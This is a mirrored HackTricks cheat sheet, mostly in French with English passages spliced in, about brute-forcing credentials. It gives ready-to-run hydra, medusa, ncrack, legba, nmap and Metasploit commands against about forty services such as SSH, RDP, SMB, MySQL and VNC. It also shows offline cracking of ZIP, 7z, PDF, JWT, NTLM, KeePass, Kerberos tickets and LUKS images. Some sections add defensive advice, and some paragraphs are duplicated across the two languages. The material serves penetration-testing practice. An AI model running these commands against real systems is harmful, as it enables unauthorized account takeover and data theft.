Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/brute-force.md

55 KiB
Raw Blame History

Brute Force - Fiche de triche


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui à :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :

Identifiants par défaut

Recherchez dans Google les identifiants par défaut de la technologie utilisée, ou essayez ces liens :

Créez vos propres dictionnaires

Trouvez autant d'informations que possible sur la cible et générez un dictionnaire personnalisé. Outils qui peuvent aider :

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl est un outil qui extrait les mots d'un site Web pour générer des listes de mots potentiellement utiles pour une attaque de force brute.

cewl example.com -m 5 -w words.txt

CUPP

Générer des mots de passe basés sur vos connaissances de la victime (noms, dates...)

python3 cupp.py -h

Wister

Un outil générateur de listes de mots, qui vous permet de fournir un ensemble de mots, vous donnant la possibilité de créer de multiples variations à partir des mots donnés, créant ainsi une liste de mots unique et idéale à utiliser pour un cible spécifique.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Listes de mots


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Services

Classés par ordre alphabétique du nom du service.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

Brute Force

Brute force attacks against the AJP protocol can be carried out using tools like Hydra or Burp Suite Intruder. These tools can be used to guess usernames and passwords by systematically trying all possible combinations until the correct one is found.

Force brute

Les attaques par force brute contre le protocole AJP peuvent être effectuées à l'aide d'outils tels que Hydra ou Burp Suite Intruder. Ces outils peuvent être utilisés pour deviner des noms d'utilisateur et des mots de passe en essayant systématiquement toutes les combinaisons possibles jusqu'à ce que la bonne soit trouvée.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra est un système de gestion de base de données distribuée conçu pour gérer de grandes quantités de données réparties sur de nombreux serveurs sans point de défaillance unique. Il est possible de mener des attaques de force brute contre Cassandra en essayant de deviner les identifiants d'authentification ou en essayant de casser les mots de passe des utilisateurs.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

Brute Force

Brute force attacks are a common method used to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. These attacks can be automated using tools like Hydra or Medusa. It is important to use strong and unique passwords to protect against brute force attacks.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registre Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Brute Force

Brute force attacks are a common way to gain unauthorized access to Elasticsearch clusters. Attackers use automated tools to systematically try all possible combinations of usernames and passwords until the correct one is found. This method is effective against weak or default credentials.

Protection

To protect against brute force attacks, it is recommended to:

  • Use strong and unique passwords for all Elasticsearch users.
  • Implement account lockout policies to prevent multiple failed login attempts.
  • Monitor Elasticsearch logs for any suspicious login activities.
  • Consider using multi-factor authentication for an added layer of security.

By following these protection measures, you can significantly reduce the risk of unauthorized access to your Elasticsearch clusters.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

Brute Force

Brute force attacks against FTP servers involve attempting to log in to an FTP server by systematically trying all possible passwords until the correct one is found. This method is typically used when other methods of gaining access to the server have failed.

Dictionary Attack

A dictionary attack is a type of brute force attack that uses a predefined list of words as potential passwords. This list can be a combination of common passwords, dictionary words, or any other set of words that the attacker believes may be used as passwords.

Tools

There are several tools available for conducting brute force and dictionary attacks against FTP servers, such as Hydra, Medusa, and Ncrack. These tools automate the process of trying multiple passwords, making it easier and faster for attackers to gain unauthorized access to FTP servers.

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Brute Force Générique HTTP

WFuzz

Authentification de base HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

Brute Force

Brute force attacks are a common way to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This method can be effective but is also time-consuming and resource-intensive.

Dictionary Attacks

Dictionary attacks are similar to brute force attacks but instead of trying all possible combinations, they use a predefined list of commonly used passwords. This method is more efficient than brute force as it reduces the number of attempts needed to find the correct password.

Rainbow Tables

Rainbow tables are precomputed tables used in password cracking to reverse hash functions and discover passwords from their hash values. This method can significantly speed up the password cracking process by eliminating the need to hash each possible password during the attack.

Credential Stuffing

Credential stuffing is a type of attack where attackers use usernames and passwords leaked from one service to gain unauthorized access to another service. This method relies on the fact that many users reuse the same credentials across multiple services.

Hydra

Hydra is a popular password-cracking tool that supports multiple protocols, including HTTP, SMB, FTP, and many others. It can perform brute force and dictionary attacks to crack passwords and gain unauthorized access to systems.

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Post Form

Brute Force

Brute force attacks are a common method used to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This technique can be used to exploit weak authentication mechanisms in web applications that use HTTP POST forms to submit login credentials.

Protection Mechanisms

To protect against brute force attacks on HTTP POST forms, web developers can implement the following security measures:

  1. Account Lockout: Implement a mechanism that locks user accounts after a certain number of failed login attempts to prevent further login attempts.
  2. CAPTCHA: Integrate CAPTCHA challenges into the login process to differentiate between human users and automated scripts.
  3. Rate Limiting: Implement rate limiting to restrict the number of login attempts from a single IP address within a specific time frame.
  4. Strong Password Policy: Enforce strong password policies, such as minimum length requirements and complexity rules, to make it harder for attackers to guess passwords.

By implementing these protection mechanisms, web applications can significantly reduce the risk of unauthorized access through brute force attacks on HTTP POST forms.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Pour https vous devez changer de "http-post-form" à "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

IMAP

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

Brute Force

Brute force attacks on IRC servers are usually performed using automated scripts that try to guess usernames and passwords. These scripts can be easily found online and are relatively simple to use. Attackers can also use tools like Hydra or Medusa to automate the brute force process.

Protection

To protect an IRC server from brute force attacks, it is recommended to:

  • Implement account lockout policies after a certain number of failed login attempts.
  • Use strong and complex passwords.
  • Monitor login attempts and look for any suspicious activity.
  • Limit the number of login attempts from a single IP address.
  • Keep the IRC server software up to date to patch any known vulnerabilities.
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

ISCSI

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JWT

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP (Lightweight Directory Access Protocol) is a protocol used for accessing and maintaining directory services over a network. It is commonly used for authentication and storing information about users, groups, and devices in a centralized directory. LDAP servers are often targeted for brute force attacks to gain unauthorized access to sensitive information.

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

MQTT

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

MSSQL

MSSQL

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

MySQL

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Brute Force

Brute force attacks are commonly used to crack passwords by systematically checking all possible combinations until the correct one is found. In the context of OracleSQL, brute force attacks can be used to guess usernames and passwords to gain unauthorized access to databases.

Prevention

To prevent brute force attacks in OracleSQL, it is recommended to:

  • Implement account lockout policies after a certain number of failed login attempts.
  • Use complex and unique passwords that are difficult to guess.
  • Regularly monitor and review login attempts for any suspicious activity.
  • Limit the number of login attempts allowed within a specific time frame.
  • Implement multi-factor authentication for an added layer of security.

By following these prevention measures, you can significantly reduce the risk of falling victim to brute force attacks in OracleSQL.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Pour utiliser oracle_login avec patator, vous devez installer:

pip3 install cx_Oracle --upgrade

Bruteforce du hash OracleSQL hors ligne (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, et 11.2.0.3) :

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

Brute forcing POP (Post Office Protocol) credentials involves attempting to log in to a POP server by systematically trying all possible combinations of usernames and passwords until the correct one is found. This can be achieved using tools like Hydra or Medusa, which are capable of automating the login process and trying thousands of combinations in a short amount of time. It is important to note that brute forcing is a time-consuming process and may trigger account lockouts or other security measures if done carelessly.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

Brute Force

Brute force attacks are a common method used to gain unauthorized access to a system. In the context of PostgreSQL, a brute force attack involves repeatedly trying different username and password combinations until the correct one is found. This can be done manually or using automated tools like Hydra or Medusa.

Protection

To protect against brute force attacks in PostgreSQL, you can take the following measures:

  1. Use Strong Passwords: Ensure that you and your users use strong, complex passwords that are not easily guessable.

  2. Limit Login Attempts: Implement mechanisms to limit the number of login attempts within a certain time frame. This can help prevent attackers from trying an unlimited number of password combinations.

  3. Enable Two-Factor Authentication: Implement two-factor authentication to add an extra layer of security to the login process.

  4. Monitor Logs: Regularly monitor your PostgreSQL logs for any unusual login patterns or suspicious activity.

By implementing these protection measures, you can significantly reduce the risk of a successful brute force attack on your PostgreSQL database.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Vous pouvez télécharger le paquet .deb à installer depuis https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

Brute Force

Brute force attacks are a common method used to gain unauthorized access to RDP servers. Attackers use automated tools to try all possible username and password combinations until the correct one is found. This method is effective against weak or default credentials. To protect against brute force attacks, it is recommended to use strong, complex passwords, implement account lockout policies, and use multi-factor authentication.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis (Remote Dictionary Server) est un système de stockage de données en mémoire open source, utilisé comme base de données, cache et courtier de messages. Il prend en charge diverses structures de données telles que les chaînes, les hachages, les listes, les ensembles, les ensembles triés avec des opérations de manipulation de données rapides.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Rexec

Rexec is a simple service that allows users to execute commands on a remote system. It is often used by administrators to manage servers and network devices. Rexec is a plaintext protocol, which means that the commands and responses are not encrypted. This makes it vulnerable to eavesdropping and man-in-the-middle attacks.

Rexec

Rexec est un service simple qui permet aux utilisateurs d'exécuter des commandes sur un système distant. Il est souvent utilisé par les administrateurs pour gérer des serveurs et des périphériques réseau. Rexec est un protocole en texte clair, ce qui signifie que les commandes et les réponses ne sont pas cryptées. Cela le rend vulnérable à l'écoute et aux attaques de l'homme du milieu.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Rlogin est un protocole de connexion à distance qui peut être attaqué en utilisant des attaques de force brute pour deviner les mots de passe des utilisateurs. Les outils couramment utilisés pour mener des attaques de force brute contre Rlogin incluent Hydra, Medusa et Ncrack.

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used when other techniques have failed. It is a time-consuming process but can be effective if the key space is small.

Countermeasures

  • Implement account lockout policies to prevent multiple login attempts.
  • Use complex and long passwords to increase the key space.
  • Implement multi-factor authentication to add an extra layer of security.
  • Monitor login attempts for suspicious activity.
hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

Force brute

La force brute est une méthode d'attaque consistant à essayer toutes les combinaisons possibles de mots de passe ou de clés privées pour accéder à un système ou un service. Cette technique est souvent utilisée pour tenter de deviner des informations d'identification SFTP.

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

La méthode de force brute peut être utilisée pour deviner les chaînes de communauté SNMP. Les outils tels que onesixtyone peuvent être utilisés pour automatiser ce processus.

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

SMB

Brute force attacks against SMB services are common and can be performed using tools like Hydra or Metasploit. These attacks involve trying different username and password combinations until the correct one is found. It is important to use strong and complex passwords to prevent successful brute force attacks.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

SMTP

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

CHAUSSETTES

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

Brute Force

Brute force attacks against SQL Server involve attempting to guess usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try different combinations of usernames and passwords until the correct one is found.

Prevention

To prevent brute force attacks against SQL Server, you can implement the following measures:

  1. Strong Password Policy: Enforce a strong password policy that includes a combination of letters, numbers, and special characters.

  2. Account Lockout Policy: Implement an account lockout policy that locks out an account after a certain number of failed login attempts.

  3. Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security to the authentication process.

  4. Limit Login Attempts: Limit the number of login attempts allowed within a certain time period to prevent automated brute force attacks.

  5. Monitoring and Logging: Monitor and log login attempts to detect and respond to suspicious activity.

By implementing these preventive measures, you can significantly reduce the risk of brute force attacks against your SQL Server.

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Clés SSH faibles / PRNG prévisible de Debian

Certains systèmes présentent des failles connues dans la graine aléatoire utilisée pour générer du matériel cryptographique. Cela peut entraîner une réduction drastique de l'espace des clés qui peut être brute-forcé avec des outils tels que snowdroppe/ssh-keybrute. Des ensembles de clés faibles pré-générées sont également disponibles, comme g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ et OpenMQ)

Le protocole textuel STOMP est un protocole de messagerie largement utilisé qui permet une communication et une interaction transparentes avec des services de file d'attente de messages populaires tels que RabbitMQ, ActiveMQ, HornetQ et OpenMQ. Il offre une approche normalisée et efficace pour échanger des messages et effectuer diverses opérations de messagerie.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet est un protocole de communication utilisé pour se connecter à distance à des serveurs, routeurs et autres périphériques réseau. Il est souvent utilisé par les hackers pour effectuer des attaques de force brute en essayant de deviner les identifiants de connexion en envoyant de multiples combinaisons de noms d'utilisateur et de mots de passe.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

Brute Force

Brute force attacks against VNC servers are common due to the protocol's lack of built-in security features. Tools like Hydra and Medusa can be used to automate the process of trying different username and password combinations until the correct one is found. It is important to use strong, complex passwords and implement other security measures to protect VNC servers from brute force attacks.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm (Windows Remote Management) est un protocole de gestion à distance utilisé pour l'administration des systèmes Windows. Il peut être utilisé pour exécuter des commandes à distance sur des machines Windows.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui à :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Local

Bases de données de craquage en ligne

Consultez ceci avant d'essayer de faire une attaque par force brute sur un Hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Attaque par force brute de texte en clair connu

Vous devez connaître le texte en clair (ou une partie du texte en clair) d'un fichier contenu à l'intérieur du zip chiffré. Vous pouvez vérifier les noms de fichiers et la taille des fichiers contenus à l'intérieur d'un zip chiffré en exécutant : 7z l encrypted.zip
Téléchargez bkcrack depuis la page des versions.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually used when the password is unknown and there is no other way to obtain it. Brute force attacks can be time-consuming but are often effective.

Protection

To protect against brute force attacks, it is important to use strong and complex passwords that are not easily guessable. Implementing account lockout policies after a certain number of failed login attempts can also help prevent brute force attacks. Additionally, using multi-factor authentication can add an extra layer of security to prevent unauthorized access.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Mot de passe propriétaire PDF

Pour craquer un mot de passe propriétaire PDF, consultez ceci : https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Craquage NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

Keepass

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

Keberoasting est une technique utilisée pour extraire des hachages de mots de passe à partir de services tels que Kerberos en attaquant les comptes de service qui ont des comptes de service SPN (Service Principal Name) associés.

john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Image Lucks

Méthode 1

Installer : https://github.com/glv2/bruteforce-luks

bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
